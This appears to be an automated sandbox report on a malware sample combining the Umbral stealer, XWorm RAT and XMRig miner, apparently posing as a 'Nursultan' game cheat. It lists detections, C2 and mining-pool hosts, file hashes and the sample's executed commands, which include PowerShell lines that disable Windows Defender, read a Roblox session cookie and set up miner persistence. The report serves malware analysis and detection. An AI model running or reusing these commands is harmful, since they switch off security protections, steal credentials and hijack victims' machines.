Malware Analysis Report

2024-10-10 09:55

Sample ID 240701-cg91lasgna
Target 6850a8c541b310a2f4a5cd88352856a3.bin
SHA256 98d19ece6f9d50124465ab6c1eef845659aada6c62d3e32a2b75b487cf4efdda
Tags
umbral xmrig xworm evasion execution miner persistence rat stealer trojan upx spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

98d19ece6f9d50124465ab6c1eef845659aada6c62d3e32a2b75b487cf4efdda

Threat Level: Known bad

The file 6850a8c541b310a2f4a5cd88352856a3.bin was found to be: Known bad.

Malicious Activity Summary

umbral xmrig xworm evasion execution miner persistence rat stealer trojan upx spyware

Detect Umbral payload

Umbral

Detect Xworm Payload

xmrig

Xworm

XMRig Miner payload

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Creates new service(s)

Drops file in Drivers directory

Reads user/profile data of web browsers

Executes dropped EXE

.NET Reactor proctector

UPX packed file

Checks computer location settings

Power Settings

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Runs ping.exe

Views/modifies file attributes

Modifies registry class

Detects videocard installed

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-01 02:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-01 02:04

Reported

2024-07-01 02:06

Platform

win7-20240508-en

Max time kernel

2s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe

"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'

C:\Windows\system32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "XMRKNZQC"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "XMRKNZQC"

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {E3AD2D07-DE2F-4A6D-92F1-B00B34649A3A} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

C:\Users\Admin\AppData\Roaming\svchost.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 mine.bmpool.org udp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 8.8.8.8:53 unknown-sunglasses.gl.at.ply.gg udp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp
US 147.185.221.20:28223 unknown-sunglasses.gl.at.ply.gg tcp
RO 5.252.178.30:6004 mine.bmpool.org tcp

Files

memory/2164-0-0x000007FEF5193000-0x000007FEF5194000-memory.dmp

memory/2164-1-0x000000013FE50000-0x0000000140150000-memory.dmp

memory/2272-6-0x0000000002D90000-0x0000000002E10000-memory.dmp

memory/2272-8-0x0000000002720000-0x0000000002728000-memory.dmp

memory/2272-7-0x000000001B6A0000-0x000000001B982000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WBQGIKRMSH1GXMZEJG8S.temp

MD5 171e4596826b2ad10e319469ecb1b8cf
SHA1 2e423d08e9e4b88dc34f9753b69e86f294f9e28d
SHA256 811d2032058427b5847c128645a6928932213596163288fd88dcfb05e2fb9438
SHA512 474d3efb94f35ed851fc5a9d9c7b94c71dd4371dd4d6980de86d32aec4c6c5d56049787cae365b73d40b7a9e2a3df10992271903e13b23fbc4b4be607d49cd59

memory/2632-23-0x0000000001D10000-0x0000000001D18000-memory.dmp

memory/2632-22-0x000000001B690000-0x000000001B972000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe

MD5 a1d8db2a1ff742bc73dd5617083f5fde
SHA1 957b182d82efb40a36099dd886ad581977880838
SHA256 d715e599815190df86069fae7220db64b5999207f77fb6e41cfe318d34c7399a
SHA512 0c5407f5707e5f2808cf1d85d71815ca67d45edc8bd8a83cc424dc927afcbad6ced5a826fff81549e5684ca0ece039513c3351ce7bf231e37885f7ed04dc513f

memory/2424-29-0x00000000002F0000-0x0000000000330000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe

MD5 f0b33cc162bfd36a995b8c90cd8ebff1
SHA1 ca1ddef08d47fc15a44a2d651b61e3decce8ebc6
SHA256 6363305dc75b8bf7aa2a8b31b0b0f38022fb0139f809ecba42e5cfe7530830e0
SHA512 1426cd246662adfd9aba4434586dc3bd54d31d395d9fafdcb15e785461a466567bff62e85085c36043cca047f951a96e5fc359c5cbf1000ff3121bba6b2905d0

C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe

MD5 c137c5f5287d73a94d55bc18df238303
SHA1 95b4b01775bea14feaaa462c98d969eb81696d2c
SHA256 d294856177658df0159cfe937e5ea95a8ee8a2ca85754d897aea3bb5d0d962c0
SHA512 ba595d185ae98152658ce95964fd6bcce7e970896b0b1c674a142d126cf0433094debcd25527d9b4f5a6568cc5a8a42aeaef536166748eea3973f8b694564aa5

memory/1856-47-0x0000000001360000-0x0000000001548000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Nursultan.exe

MD5 0df0a039309525fd27e1b5e056c92b6a
SHA1 7551c27a9123cb56c4218647966a753794ac2961
SHA256 a29379238f93fa6301dd390e635b0c1f53d9197c68adc0f00cbc52bb4311a23f
SHA512 2c00ea216368e254167bd5f2562cbc93953b9c4756765f4504aaae7e9dc45e5584fef1ddb174b651a9a090c7217424e5b80dec58f6f2493c54704f46c35fede6

memory/1880-61-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-60-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-59-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-58-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1880-56-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-54-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-52-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1880-51-0x0000000000400000-0x0000000000412000-memory.dmp

memory/1856-49-0x0000000005A20000-0x0000000005AD6000-memory.dmp

memory/1752-68-0x0000000001D30000-0x0000000001D38000-memory.dmp

memory/1752-67-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/1584-74-0x000000001B620000-0x000000001B902000-memory.dmp

memory/1584-75-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

memory/476-94-0x0000000001E90000-0x0000000001E98000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 4a5887281298574ed5243753fd6f3d15
SHA1 be4f930dc2b31fece3e8b5afdbdeca328e7d1439
SHA256 40a090399f5e0b09f05f55a694ec2c35b6786dd261dfd4e2d8b1d8650f25a0c3
SHA512 76945f3617e6b63ae39cc1a4e5be75dff0cad15b33d3d4ac7c5d7fb15c3d80e62d391a3ddea00eed629ae1cf2fb7cad032248d5b1ba0b28fbfb027ecd43defb9

memory/2988-108-0x0000000002790000-0x0000000002798000-memory.dmp

memory/2988-107-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

\Users\Admin\AppData\Roaming\svchost.exe

MD5 9af17c8393f0970ee5136bd3ffa27001
SHA1 4b285b72c1a11285a25f31f2597e090da6bbc049
SHA256 71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019
SHA512 b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3

memory/3032-138-0x0000000001D40000-0x0000000001D48000-memory.dmp

memory/3032-137-0x000000001B580000-0x000000001B862000-memory.dmp

memory/2292-144-0x0000000019F60000-0x000000001A242000-memory.dmp

memory/2292-145-0x0000000000A20000-0x0000000000A28000-memory.dmp

memory/2444-157-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-166-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-167-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-165-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-163-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-164-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-161-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-162-0x00000000001B0000-0x00000000001D0000-memory.dmp

memory/2444-160-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-159-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-155-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-158-0x0000000140000000-0x0000000140848000-memory.dmp

memory/2444-156-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1656-153-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-149-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-148-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-147-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-146-0x0000000140000000-0x000000014000E000-memory.dmp

memory/1656-150-0x0000000140000000-0x000000014000E000-memory.dmp

memory/2976-170-0x0000000000C70000-0x0000000000CB0000-memory.dmp

memory/2616-173-0x0000000000FA0000-0x0000000000FE0000-memory.dmp

memory/2444-174-0x0000000140000000-0x0000000140848000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-01 02:04

Reported

2024-07-01 02:06

Platform

win10v2004-20240611-en

Max time kernel

13s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"

Signatures

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Umbral

stealer umbral

Xworm

trojan rat xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A

Stops running service(s)

evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\URL Protocol C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347 C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2128 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 2128 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 2128 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 2128 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
PID 2128 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
